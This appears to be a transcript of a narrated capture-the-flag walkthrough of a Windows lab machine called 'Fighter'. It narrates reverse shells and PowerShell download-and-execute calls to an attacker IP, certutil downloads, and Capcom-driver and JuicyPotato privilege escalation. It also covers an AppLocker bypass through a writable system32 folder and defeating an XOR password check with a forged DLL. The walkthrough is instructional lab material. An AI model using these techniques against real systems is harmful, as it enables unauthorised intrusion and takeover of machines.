doing this to eliminate the possibility of that being the issue. And I'm not sure why it just called rev 445 again. It should have called rev.ps1. Cat launcher, download string, rev. Crap. I know what just happened. We only did launcher and copied it to clean.bat, so let's move rev 445 and be lazy and just change this to port 443. And now we'll wait on the next callback to see if anything happens. So we have another shell. So let's see if it's 64-bit. And the reason I keep harping on this because it's technically in a sandbox if it's 32-bit and some things just don't work as expected. So if we do environment is 64-bit process, it returns true. So we know we are in a 64-bit version of PowerShell. The next thing to do, and this is a big leap, but because of all the Street Fighter reference, I remember there being like a Capcom Driver bug that people called a rootkit. So I'm going to look at the drivers installed. I'm going to do a command called driver query, and we're going to see if Capcom Driver is installed. So going up and see, and we stopped right on it. So the Capcom module is installed, so this should be a good privesc. I'm not going to go into the privesc because there's already too many good videos that are over an hour long just going on this. My favorite is Fuzzy Security Capcom. Let's see. This is by Beef or Fuzzy Security. He has a lot of good videos on going over his process of hacking this. And if you like that video, go over to his Patreon. And if you subscribe, he does maybe a video, I forget the frequency of his videos, but all his videos are really good. So definitely you want to become a Patreon to him if you like the videos here and it's not too advanced. If this is too advanced for you, you may want to do some learning before you start giving money for the videos because it doesn't assume zero level knowledge. It assumes you have some knowledge and some coding. But highly recommend reading this blog post thoroughly and watching the videos. And if you like the videos, subscribing to them. Enough of that. Let's just pop this. So if we just do GitHub, he probably has a link to GitHub here. GitHub. Capcom rootkit is available on GitHub. Awesome. So let's clone this. And we can, let's go to a directory where we can write. Who are we? We're Decoder, okay? Users, Decoder. And what do I want to do? I want to get a file on the box. So, go up a directory, get clone, paste this, go into this, and we notice there's a lot of files here. We do find.grep ps1, or we can do -exec, or not exec name star.ps1, same thing. And the unfortunate thing about this is some files don't have a line break at the very end, so we can't just combine them into one file by doing something like exec cat, because if we less this, and we'll probably see some functions like this where it ends on a curly brace and then goes into a function name which isn't PowerShell, or it'll fail. So what we have to do is we do a for loop. So the reason I'm doing this is because I don't want to upload all these files onto the box. I just want to create one big PS1 file. So for I and find name.ps1, do echo I. Okay, it echoes all the files. So now we can cat the file, echo nothing to put a line break, and then we can call this //dub Capcom.ps1. So let's look at this. Everything, or that function, now is good. We have to get that file onto this box. So let's use cert-util again to just download it. URL cache split http 10.10.14.3 capcom.ps1 into, we'll just say capcom.ps1. Download it, and we are denied. That's weird. Let us just try Capcom. Maybe AppLocker isn't fully bypassed and we still can't write .ps1. Completed successfully. So we can get content capcom.ps1. We want to assign that to a variable. We'll just do x is equal to get content capcom.ps1. Cannot find x is equal to get content Capcom. There we go. And I can't print that. dir here. Capcom exist. Let's just try IEX get content Capcom. Cannot convert system object to type. Let's see. How can we load this? If we do X, trying to think right now. We should be able to just type Capcom. Is not registered. I wonder if that .\Capcom actually loaded it into my memory space. So Capcom elevate PID is the function we want to run that's in this capcom.ps1 script. And no, it did not. So let's see. Let's just do a IEX new object net.web client download string. I don't know why I didn't do this in the first place. http 10.10.14.3 capcom.ps1. There we go. It went, hit a web server, loaded Capcom, did IEX, put it into memory. We're good now. So if we do Capcom-elevate PID, duplicating system token, and assign the system token to our current shell, because if we do who am I, we're NT authority system. So now we can finally go into the administrator directory, go to desktop, root. If we do a dir, oh, it's root.exe. So we're not even done with the box yet. We still have another challenge to do, and that is all this reversing to get this root.exe working. So just when you thought you were done, the box brings you back in. And we can do cert-util encode root.exe to root.exe.b64 and cert-util encode checkdll.dll checkdll.dll.b64. Okay, we can type those files root.exe.b64. And there's two ways to do this, and we may get into the second way to do this cracking challenge at the very, very end of the video. Essentially, you just write your own check.dll, always pass it a success, and then you're good. So create a directory called reverse, and let's add check.dll. What was this? Was this root or check? That is root. So root.exe.b64. Paste that in. Okay, and now we need type check.dll.b64. dir type checkdll.dll.b64. Go to the top, go over here, and I'm hitting spacebar to enter copy mode. Go all the way down, enter, go up, vi checkdll.dll.b64, and then putting right bracket to paste. Now we can base64-d root.exe to root.exe. If I can type base64-d checkdll to checkdll.dll. And we can do a file on everything, and we see we have successfully put the executable and DLL on a system. So I'm going to go back to this window, and we'll name this reverse. And go into reverse, and I'm going to use IDA to open these files and see what's going on. It is installed in opt IDA, then IDA 64, and this is the free version, so you can just go over to Hexrays and download it. And we're going to disassemble a new file, boxes, fighter, reverse, root.exe. Okay, it's loading everything up, and we have the assembly. So we don't know exactly where we want to go. If we go back to our shells and run root.exe, we can see it's asking us for a password here. So chances are that's where we want to start looking at the program. So going back into IDA, we can go into View, Subviews, Strings, or Shift F12 in the future. And then we can find that string, double click on it. That's not what I wanted. Go back into Strings, Shift F12, and I want to show cross references. That's Control X, I believe. To do that here, Control X, push. Oh, so all I did, crap. Strings, double click, and then if I do space or Control X to go here, that's what I want to do. And then we can see the actual module. Security check cookie. They didn't strip symbol names. So we can see if we don't input anything, it just asks us for the password. This is printing the usage. I did not mean to double click that. And security check cookies, not what I thought it was. So redo this. Go here. So what we want to do is look here. We see it calling check. And then if check fails, sorry, check return that. If it succeeds, it does something. So we can just go to check, Control X to view cross references, and we see it's going to the import table, and it's loading it from a DLL. So let's do a open, new instance, new, and we want to look at check.dll now, because this is where the check function actually exists. DLL entry point. Do we have anything that calls check? Is this stripped? So let's do Shift F12 to go into strings. And let's just see what this string is. Control X. Go to this. And this looks like the function, or a function we want. So it's returning 1 if all this succeeds. So the first thing it's loading is this FMFEHOL into memory. Then it's XORing every byte in that with 9. And then comparing it against... Okay, so here's what's happening. Let's go back to reverse. The notes.txt, I guess. So 1, it asks for a password. And we'll say password is equal to input. 2, it's going to pass input to check. And this is checkdll.dll. It's an external reference. 3, check.dll is going to take input, XOR it with 09. 4, we're going to compare or say if input is equal to this, return true, else return false. Essentially, that's what this program is doing. So we have to XOR this field with 09, and if we do that, then when this check call XORs or input with 09, it goes to this, and then it'll return true, and everything will be fine and dandy. So let's move notes into reverse and create a program to do this. So vi crack.py. So we want to do a for I in this. So we're looping through every character. We can verify that with just print I. And then if we Python 3 crack, yes, we're looping through every character. So next thing we want to do is print the character value, and we got to convert this into an ordinal number, so ord I. So this is taking every character and converting it into a number. Then we can do ord, and we want to do it on this byte. 03. There we go. And we have it, I think. I'm not sure if the end is a plus there, but we can print that, and we can also say end is equal to nothing, so we're not doing a new line. Print, so we do a new line. And we can try putting this as the password. And I actually think that is a mistake from me. If we go back in here, I just copied the double quote saying it's a string. So we don't want that double quote there. We just want this. If you go, you can do root.exe, put the password, and you got root.txt. So that box is finally done, but let us look in the unintended way. So I'm going to exit out of everything, and we're going to start over from just the SQL shell. So exit. This can be exited. This can be exited. And at the very, very end of the video, we'll probably write our own DLL to always pass one in check and then just execute the file that way. But don't pack database. Yeah, I'm okay with losing all the data. So all we want is 2 windows, one at the inject prompt, and then one at we need 3 windows. There we go. This needs to be in dub because we're gonna call rev.ps1. Python m simple http server 80. Then we can do Python 3 inject.py to get our shell. And then, does this have everything? I don't think so. PowerShell IEX. You can just search IEX. We can just copy this. Maybe this will work. It's been a long video. I'm brain's starting to not think anymore. Rev.ps1. We probably have to call PowerShell. We have to call the 32-bit version of PowerShell. That's what I have to do. So, C:, Windows syswow 64, Windows PowerShell v1.0, PowerShell, IEX, and that did not call it. So why did it not? Rev. We got a file, we just weren't listening on 443. There we go. We paste this again. We will get a shell. Who am I? SQL serve. So we're good there. So the potato exploits take advantage of the SC impersonate privilege. And what that allows is the process to essentially impersonate something. And the potato attack is trying to think of a good way to explain it quickly. It's like when you SMB relay, it's essentially that. So we're forcing a DCOM service to connect back to us and essentially doing a SMB relay. I think I explained it better in the tally video, but before we can even do anything potato-wise, we have to find a place where we can execute EXEs. We could just hardcode all of JuicyPotato in one binary and call it like with a powerless shell or CSproj file, but I really like having arguments because it just speeds things up. This box was created by Decoder. Decoder is the creator of JuicyPotato and has done tons and tons of research into this. And he disabled the bits. He tried to make this box not potatoable. And he made the box, kept researching, and found a different way into it, and then created JuicyPotato around that to do this box in a real and unintended way. And that's what we're going to be looking into. So, the start of this exploit chain is just finding out that AppLocker by default whitelists system32. So anything under system32 can be bypassed from AppLocker. And Buffer Override had pointed this out to me when I was trying to do it the complicated way. He's like, dude, just do it this way. It's going to be easier if you can do that. So a good place to write to that is common is, we can just test it real quick. C:, Windows system32, spool, drivers, color, and now we'll do test.exe, or text.exe because I can't type. And I did not put a director. Redirect that to here. And we see we actually wrote there. Text.exe does exist. And if we just echo test to our temp directory /test.exe, temp doesn't exist there. Echo test to SQL serve users SQL serve test.exe. We get access denied. So that is a AppLocker bypass right there. If we can write to that directory, then we can just execute things out of it. So you could just drop a Empire PS1 script there and then execute it and use that as your working directory for Empire, and AppLocker will not stop you one bit. So what we have to do is get JuicyPotato on our box. So if we just Google JuicyPotato, you'll come to this GitHub with some usage instructions. And here we see them specifying a different CLSID because bits was not working. So let's see if I can find this. It's testing interesting CLSIDs. How do I test it? So let's see. Okay, I think we got everything we need. And this is going to be a little bit of a pain, but it'll be worth it in the end, I guess. So keep note of this page, the JuicyPotato /test, because this is going to be how we test all the CLSIDs to find ones that work. And then also keep note of don't know, but we'll download this and copy it to a Windows machine that has Visual Studio on it so we can write code. So I'm going to be doing that now, then switch over to Windows. Actually, before we do that, let's just download binaries and try it out to see why we have to put it in Visual Studio. So let's see. Example. There should be binaries to download. Available on Black Arc. No. Automatic builds. This is what we want. So if we just download this, save file, and we will go back into www and then copy downloads JuicyPotato, and I already had one there, so let's do 1.exe. We'll just call it j.exe for short. And we have to put it in all caps because our SQL shell converts things to caps. So if we do cert-util to download this, -url cache split f http 10.10.14.3. We called it j.exe, and we want to save it to Windows system 32 spool drivers color j.exe. Right? Not found. j.exe forward. What the hell? It exists. Wait. It decided not to be all caps there. I don't know why that just happened. Oh, we're in PowerShell. We're not in an SQL shell. Let's exit and do this from our SQL shell. Python 3 inject.py. Just for flair. Now we downloaded, and if we try running this, we can get the output. We can call a process. So we'll call, who am I? It doesn't, oh, T, stir for try both, -P, call a program. We'll do C:\users decoder clean.bat because that's the one that will give us a shell. And then COM port to listen to 9001 because we got to be above 9000. And wrong argument. So it took a while to figure out what was actually going on. And if you remember, whenever we download files, it puts everything in uppercase. So it passed uppercase T, uppercase P, uppercase L, and that's why it doesn't recognize anything. So this is why I was creating a different version of JuicyPotato to accommodate for this. If we just did it in the PowerShell, it would probably honestly work. But I want to do it without PowerShell and do it from my SQL shell. So we have to modify JuicyPotato to allow it to accept uppercase arguments, or we can troubleshoot SQL and figure out how to make them lowercase. The easier thing is just to recompile the program making these uppercase. So let's do that. So I have JuicyPotato on my desktop. Let's just go into it, and we can run the Visual Studio. So it has opened, and we can go into Solutions Explorer, go to source files. That's what I was looking for. And then JuicyPotato.c++ and get the code. But before I do any editing, the very first thing I always do is test the build to see if our environment is set up close enough to the creators where we can just build this. Because nothing's worse than doing a bunch of modifications, finding out it doesn't build, and trying to decide if you broke the application or the application came broken. So always eliminate that, and it looks like build has succeeded, so good. Now we just scroll through the program and search for the argument that we want. So let's see. Here we go. Here's all the cases. So this is saying a switch, and then if T, set process type, if P, set process name, etc. So change this to capital T, capital P, capital L, capital C, and you get the deal. Capital M, capital H, capital K, N, Z, and that should be it. So let's save JuicyPotato, build the solution, and then we'll go to release, x64, and JuicyPotato. So we have to copy this back to a CLSID, so I'm going to do that, pause the video, get it over there, and we will continue on and upload this and try to get it to work. JuicyPotato should be in my www directory. There we have it. That is the one we had just compiled. So what I'm going to do is copy JuicyPotato to be, let's see, we'll call this please subscribe.exe. And I'm going to cert util. I did open link. Do not want to do that. Copy. Opened a new window. Don't want to do that either. There we go. That's what I want to do. Please subscribe.exe. And we'll copy this into C:\Windows System 32 drivers, whatever. And we'll call this JuicyPotato.exe. Successfully copied it. If we go to execute this, it does run, and we can do -T. Oh, we can do lowercase now. It doesn't matter because it's going to uppercase it anyways. -P, C:\users, decoder, clean.bat, and -L, we'll do 9001 because, again, why not? and we have error. It's testing this CLSID, which is bits, and we get receive failed with error 10038. Bummer. So, not fully working. What we have to do is find a new CLSID. And if we went to JuicyPotato, and I think they have a bunch. If we go interesting CLSIDs, we could do Windows 2012 data center. And does this go further? Yeah. So you want to look at this CLSID, the WUA serve has this app ID, this CLSID, and upon using it, you get system. That's how you read this table. So let's generate this table and see exactly how it goes. So we said the key thing was in test. So test CLSID.bat. That's what we want to run. So let us clone this repo so we can see what test CLSID.bat looks like, copy it to the server, and run it. So git clone, cd JuicyPotato, test CLSID. So we have to create a CLSID.list, and then we should be good after we do that. So the one thing we'll have to edit in this bat file right off the bat, pun not intended there, but to use this path. So edit this, and we want to use that and do that. Okay. We probably should do it for the result, the log as well. So copy. Whoa, too much. Sometimes it's better just to type it, and then I'm going to make a typo and say I should have just copied it all along. But that should be fine. Get rid of that annoying pop-up. So f in CLSID.list do JuicyPotato result.log. That looks good. So now we have to find a way to generate these CLSIDs. So how did Decoder do that piece? There should be like a get CLSID. So if we go back a few times, that's in Capcom. Go back here. Is there get CLSID? Let's see if there is here at all. Find dot grep-i get CLSID. Okay. It is there. And let's see. Get CLSID. What is this doing? It's making a call to join object. And on error stop. Result OGV. Let's see. Output in CSV. Export CSID list. I don't know if we want that visual table. And we probably want to change where it's outputting to. What is target? Target replace. We can probably just do this. So new PS drive, and then run this command maybe. Because all we care about is CLSIDs. We don't want the app ID or anything. So let's try that. In order to do that, we have to get a shell. But before we start playing around on the server, because it has those protections, I'm going to switch back to my Windows machine and see if we get this working, and then we'll do it on the box. So we're back in Windows. Let's minimize everything. Go in JuicyPotato. We wanted CLSID. We can edit this. And all we're going to want to do is copy this, paste it, and then copy this, paste it. This may take a few seconds or minutes, I don't know. Hopefully it finishes relatively soon. There we go. And we can see what the contents is. Just a bunch of CLSIDs. And I'm not sure what that second row is. So let's see. We can grab one of them at random. Copy. And go to entering CLSIDs. Pick 2012. Paste. And is this only an app ID? No, this is both an app and a CLSID. What the hell? Let's try another one. I'm hoping to find one where it's only one side of the table. This one doesn't exist at all. So that may not be an interesting one. Let us try this one. Doesn't exist at all. So select. I really wish I knew why it was doing in 2 rows. Grab, paste. You know, it'd be easier if I do it the reverse. Since this has, or just dread the frickin' title. CLSID is on this side. So this does work to get a listing of CLSIDs, and that's all we wanted to do. So we can go back, get a PowerShell window, and dump CLSIDs to get a test thing going. So we're back on Linux. We have to actually get a PowerShell console. So I'm going to do netcat lvnp 443. Netcat lvnp 443. Go here. And we have to do the 32-bit version of PowerShell. I don't think that's going to screw anything up. So C:, Windows syswow 64, Windows PowerShell v1.0, PowerShell, then IEX new object, net.web client, download string, rev.ps1. I think that's good. It is not. Could not find file. I didn't put the whole URL. I only put rev.ps1, http 10.10.14.3, rev.ps1. There we go. And we get shell. So now we have to go into a directory to make this easy. So we're in system32. We just go to spool, drivers, color. And this is where we can write anything we want to. So let us go back. Where is CLSID? Get CLSID. Hopefully we can run this command. We can. Run this. And this will take probably 30 seconds to run. Or not. That was quick. And it ran successfully. So let's grab That's funny. I was saying that's funny to percent app ID. So it errored somewhere. Grab all these. Go here. We got to go into our www directory. V. What was it? CLSID.list. We don't want to do that yet. V temp.list. Paste everything. Paste everything? There we go. Sometimes you just have to ask it twice. awk-f. We don't have to do -f. We just want to print 2. temp.list. Okay. CLSID.list. And now we got a listing of CLSIDs. So we can upload that to the web server. So does the shell still work? It's just slow. Do a dir. Let's just do it here. Cert util URL cache split f http 10.10 14.3 clsid.list to clsid.list. And that file is here. So we also have to do test.bat, I believe. And we modified a test.bat. So find.grep. I'll just do .bat. Because this is the file we want. cp this to www. Less test clid.bat. Make sure we have all the files we need. clsid.list, we got that. JuicyPotato.exe, that exists there. And result.log, that's going to exist. So let us upload that file next. Copy this. If you didn't have PowerShell on the box at all, you could just stand up Windows 2012, whatever it is, and do it that way. So test clsid.bat. I think that's what it was called. Yep. So we can exit this PowerShell because I don't want it being in a 32-bit sandbox to taint any results if I can help it. And what we want to do now is call C:\Windows system32 what is it? Spool, then drivers, then color, then test clsid.bat. And this will probably take a little bit longer to run. Or it's going pretty quickly, actually. Hopefully it's working. Normally when it goes this quick, I question if it's actually working. And when this goes to like 10,001, we know it hit a successful CLSID. And it did not. So I don't know if that worked at all. We can go back to driver and we can copy this path, type, I have to put a C there, C:\result.log, and it wasn't working. It was erroring a lot. And the reason is it's putting the capitals, or it's putting lowercase when we want it to put capitals. That's a funny bug. Let's go back to www v test clid.bat, and we will switch everything to capitals because that is how our script, a modified binary works. In hindsight, we probably should have just made arguments case insensitive, so we didn't have this issue. So let us do cert util URL cache split f http 10.10 14.3 test clsid.bat, and we'll call it test CLSID.bat. Maybe we can overwrite the file, maybe we can't. We'll find out. Oh, it's got to be all capitals now. Test. Because before we were downloading over PowerShell, where the script did not do that to us. But now we're not using PowerShell, we're just doing this. So let's now run this script. And hopefully it doesn't go as quick, because that was scary fast. So it looks like it's going a little bit slower, and that is expected. So this could take some time to run. I'm going to pause the video and we'll probably come back to it. We could, I guess, before pausing the video, maybe it's just not writing the standard out. So we can test that aspect if we just go back into SQL inject, Python 3, inject, and we can look at result.log. So this is where we did type before. And I should have deleted result.log before starting this, because we're going to get a bunch of error messages first, because it just appends to this file. So I'm going to let this run. It looks like the SQL injection's taking a little while to execute commands. It doesn't like being like multi-threaded or whatever and running two things at once. So we're just going to come back in 5-10 minutes and see if it's working. So I think it's finished. I'm going to clear up my input, and we're just going to run this again. It's going to throw a bunch of weird errors for a little bit, because remember, we had ran JuicyPotato incorrectly the first time because it capitalized the arguments when it wasn't expecting it. So, or it didn't capitalize, did something. So we just gotta let this run its course, and eventually it will output the output of our last run, which looks like this. So we see this CLSID lets us run as the SQL serve user, not too beneficial. This one would let us run as local service. We're getting there, but I really want like local system or administrator or something like that. It'd be awesome if we got like trusted installer, which is more permissions than local system, but I don't think we'll get that. So just going to let this output the output of result.log. Probably take a little bit because, again, we put a bunch of junk before the stuff we wanted without cleaning it up, but you live and learn. So I'm going to cut out stuff after I say this, so we speed it up. It has finally finished, and we see the CLSIDs we want here. So let's just try one of these NT authority system ones. So if we pick this, we can do C:, Windows System 32, spool drivers color JuicyPotato.exe. See this dreaded output one last time. Paste the CLSID down there so I have it. Copy this. We want to call both with -t star, try both. -p program, we're going to do C:, users, decoder, clean.bat, because we know this will return a shell. Let's see, the next one is a port to listen on, 9001, because why not? -c, CLSID, we can see the default is bits there, but we're doing this one, which who knows what this is. And the last thing we want to make sure is we listen on 443. Okay, run this, and hopefully this works. There we go. So we got a callback as NT authority system. It executed that bat file we had on the server. And if we do a who am I, we are NT authority /system. So that is doing the box through JuicyPotato. We can go to user administrator. I forgot it's users administrator. users, administrator, desktop, and we can get these files. So that is the box through JuicyPotato. I suppose we can write our own DLL to return 1 to bypass root.exe, and maybe I'll call it a day after that because this video is getting long. So yeah, let's just write our own DLL to do the root.exe a different way, so we have 2 completely different paths once you get shell on the box. So move over to Windows, copying those files. I am on Windows and we have the 2 files there. If we open up a command prompt, go to desktop, run root.exe, and put anything we want, like leave a comment, please, we see Surrey check return 0. If you remember, if we went to our notes, it was going to root.exe, calling a function out of checkdll, and if this returns 1, then it will print out the flag. If it doesn't return 1, then it prints this out. So let us remove this DLL. And when we run this thing, it'll probably error out because it can't find checkdll.dll. And we're going to create our own DLL. So if we go to File, New Project, Win32 Console Application, we'll do checkdll. Next, we're making a DLL. Okay, finish. And we probably didn't need these security checks and everything, but it hopefully won't hurt us. And it's a relatively simple DLL that we just have to make. Okay. So the very first thing we want to do is make an external reference to C, decl spec DLL export, int check. This is going to be a check function. And get rid of that. Now we just got to create the function because it says function definition check not found. So we're creating that. And all we want to do is return 1. Program looks happy. We can build the solution. And it'll take a few seconds to compile. There we go. It looks like it's compiled. We can go into this directory. Whoops. CMD. CD. Paste. And we can just test this out. So run DLL 32. Check DLL. And we want check. Doesn't do anything. If we do check 2, it errors out. So that's exactly what we want as the behavior. So let's go, paste this, copy check DLL, and root.exe, just send the same exact thing, and we get the flag. So now the box is 100% done. Hope you guys enjoyed. Take care, and I will see you all next week.